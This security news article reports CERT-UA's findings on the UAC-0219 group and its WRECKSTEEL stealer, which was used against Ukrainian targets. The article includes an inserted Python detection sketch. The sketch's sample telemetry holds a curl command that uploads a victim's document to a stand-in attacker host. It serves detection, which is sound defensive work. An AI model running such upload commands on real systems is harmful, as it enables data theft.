UAC-0219 Hackers Use WRECKSTEEL PowerShell Stealer to Harvest Data from Infected Computers

The Ukrainian Computer Emergency Response Team (CERT-UA) has identified a series of cyberattacks attributed to the hacking group UAC-0219.

These attacks, ongoing since late 2024, utilize a sophisticated PowerShell-based malware tool known as “WRECKSTEEL” to exfiltrate sensitive data from compromised systems.

The primary targets include government agencies and critical infrastructure entities in Ukraine.

Attack Methodology and Tools

The UAC-0219 group employs a multi-stage infection process to execute their malicious campaigns.

The attack begins with phishing emails containing links to public file-sharing platforms such as DropMeFiles and Google Drive.

These links, sometimes embedded in PDF attachments, lead victims to download a VBScript loader disguised with a “.js” extension.

Once executed, the loader downloads and runs a PowerShell script, which is the core component of the WRECKSTEEL malware.

The PowerShell script is designed to search for and exfiltrate files with specific extensions, including documents, spreadsheets, presentations, images, and PDFs (*.docx, *.xlsx, *.pptx, *.jpg).

Additionally, it captures screenshots of the infected system and uploads all collected data to attacker-controlled servers using the cURL utility.

This functionality enables UAC-0219 to gather intelligence on high-value targets efficiently.
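As an added illustration of how a defender might hunt for the execution chain described above (this is example code, not CERT-UA's or the article's), the following Python sketch flags a curl.exe upload whose parent is powershell.exe and whose grandparent is a Windows script host running a file named with a “.js” extension. The event fields and sample telemetry are constructed assumptions, not a real EDR schema or real indicators.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-cased (assumed field)
    cmdline: str    # full command line (assumed field)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# cURL switches that send a local file as the request body (the upload step)
UPLOAD_SWITCHES = (" -f ", " --form ", " -t ", " --upload-file ",
                   " -d @", " --data-binary @")

def is_upload(cmdline: str) -> bool:
    cmd = " " + cmdline.lower() + " "
    return any(s in cmd for s in UPLOAD_SWITCHES)

def find_chains(events):
    """Return (loader_pid, powershell_pid, curl_pid) for each curl.exe
    upload whose parent is powershell.exe and whose grandparent is a
    script host launched with a '.js'-named file."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image != "curl.exe" or not is_upload(e.cmdline):
            continue
        ps = by_pid.get(e.ppid)
        if ps is None or ps.image != "powershell.exe":
            continue
        loader = by_pid.get(ps.ppid)
        if loader is None or loader.image not in SCRIPT_HOSTS:
            continue
        if ".js" not in loader.cmdline.lower():
            continue
        hits.append((loader.pid, ps.pid, e.pid))
    return hits

# Constructed sample telemetry: one benign download chain and one
# loader -> PowerShell -> cURL upload chain matching the article's description.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(101, 100, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcEvent(102, 101, "curl.exe", "curl.exe -o tool.zip https://example.invalid/tool.zip"),
    ProcEvent(300, 100, "wscript.exe", "wscript.exe C:\\Users\\u\\Downloads\\invoice.js"),
    ProcEvent(301, 300, "powershell.exe", "powershell.exe -File C:\\Users\\u\\AppData\\Local\\Temp\\s.ps1"),
    ProcEvent(302, 301, "curl.exe", "curl.exe -F \"file=@C:\\Users\\u\\Documents\\plan.docx\" https://attacker.invalid/up"),
]

if __name__ == "__main__":
    print(find_chains(SAMPLE_EVENTS))  # [(300, 301, 302)]
```

In practice the same three-hop check can be expressed as a correlation rule in an EDR or SIEM; the point is that parent lineage plus a file-bearing cURL switch separates the exfiltration step from routine scripted downloads.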

Evolution of Tactics

CERT-UA’s analysis indicates that UAC-0219 has been refining its tools and techniques over time. In 2024, the group relied on executable files created with the NSIS installer.

These files contained decoy documents (e.g., PDFs or images), VBScript-based stealers, and third-party software like “IrfanView” for screenshot capture.

However, starting in 2025, the group transitioned to using PowerShell exclusively for both data theft and screenshot functionality, streamlining their operations and reducing detection risks.

According to the report, the WRECKSTEEL malware exists in multiple versions written in VBScript and PowerShell, underscoring its adaptability.

The use of compromised accounts to distribute phishing emails further complicates attribution and mitigation efforts.

CERT-UA urges all organizations to remain vigilant against this threat. Indicators of compromise (IOCs), including file hashes and malicious URLs used by UAC-0219, have been shared publicly to aid detection efforts.

If signs of compromise are detected, CERT-UA recommends immediate reporting to facilitate incident response and containment measures.

This campaign highlights the persistent threat posed by cyber espionage groups targeting critical sectors.

Organizations are advised to implement robust email filtering mechanisms, regularly update software systems, and train staff on recognizing phishing attempts to mitigate such risks effectively.


Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
